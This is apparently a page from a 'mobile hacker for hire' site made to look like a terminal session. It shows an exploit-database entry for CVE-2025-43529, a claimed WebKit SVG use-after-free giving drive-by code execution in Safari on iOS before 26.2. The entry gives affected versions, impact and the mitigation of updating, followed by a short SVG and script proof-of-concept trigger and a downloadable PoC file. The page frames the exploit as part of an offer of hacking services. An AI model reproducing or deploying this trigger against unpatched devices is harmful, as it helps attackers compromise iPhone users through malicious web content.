[~]mobilehackerforhire$ hire --now
    cd ../exploit-db
    root@mhfh:~#cat /var/db/exploits/CVE-2025-43529.json
    exploits/CVE-2025-43529.md
    CVE-2025-43529iOSRCECritical

    WebKit Use-After-Free arbitrary code

    affected
    < 26.2
    disclosed
    2025-12-15
    discovered
    2025-10-10
    patched
    iOS 26.2
    author
    Apple Security
    platform
    iOS

    ## description

    A Use-After-Free vulnerability in WebKit's SVG rendering component allows for arbitrary code execution during web content processing.

    ## impact

    Drive-by RCE inside Safari renderer.

    ## mitigation

    Update to iOS 26.2 or later.

    ## proof of concept

    <!-- SVG UAF Trigger -->
<svg>
  <use href="#target" id="uaf" />
  <g id="target" />
  <script>
    document.getElementById('target').remove();
    document.getElementById('uaf').getBoundingClientRect(); // trigger UAF
  </script>
</svg>

    ## downloads

    uaf-svg.html
    SVG PoC
    3 KB

    ## references